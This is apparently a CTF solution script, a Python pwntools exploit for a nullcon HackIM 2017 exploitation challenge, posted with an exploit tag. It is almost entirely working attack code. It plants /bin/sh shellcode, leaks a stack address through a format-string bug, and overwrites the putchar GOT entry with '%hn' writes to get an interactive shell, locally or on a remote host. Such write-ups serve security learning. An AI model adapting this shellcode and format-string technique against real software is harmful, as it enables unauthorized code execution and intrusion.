Tags: #exploit
Rating:
#!/usr/bin/env python
from pwn import *
import sys
# nullcon HackIM CTF - 2017
# Task: Exploitation Question 1 - 200 pts
# Author: Simone Ferrini
def choose(r, c):
r.sendline(c)
def insert(r):
choose(r, '1')
r.sendline("\x90"*8 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80")
r.recvuntil('Enter book id:')
r.sendline('1')
def leak(r):
choose(r, '3')
r.recvuntil('Enter query: ')
r.sendline("%7$p")
return r.recvline()[16:-1]
def pwn(r, l):
choose(r, '3')
r.recvuntil('Enter query: ')
high = int(l[2:-4], 16)
low = int(l[5:], 16)
high = high - (4 + 4)
low = low - high
putchar_got = 0x0804b038
got_to_override = putchar_got
r.sendline(p32(got_to_override) + p32(got_to_override + 2) + "%" + str(high) + "x%12$hn" + "%" + str(low) + "x%11$hn")
def exploit(r):
insert(r)
pwn(r, leak(r))
r.interactive()
if __name__ == "__main__":
log.info("For remote: %s HOST PORT" % sys.argv[0])
if len(sys.argv) > 1:
r = remote(sys.argv[1], int(sys.argv[2]))
exploit(r)
else:
r = process(['level1.bin'])
print util.proc.pidof(r)
pause()
exploit(r)
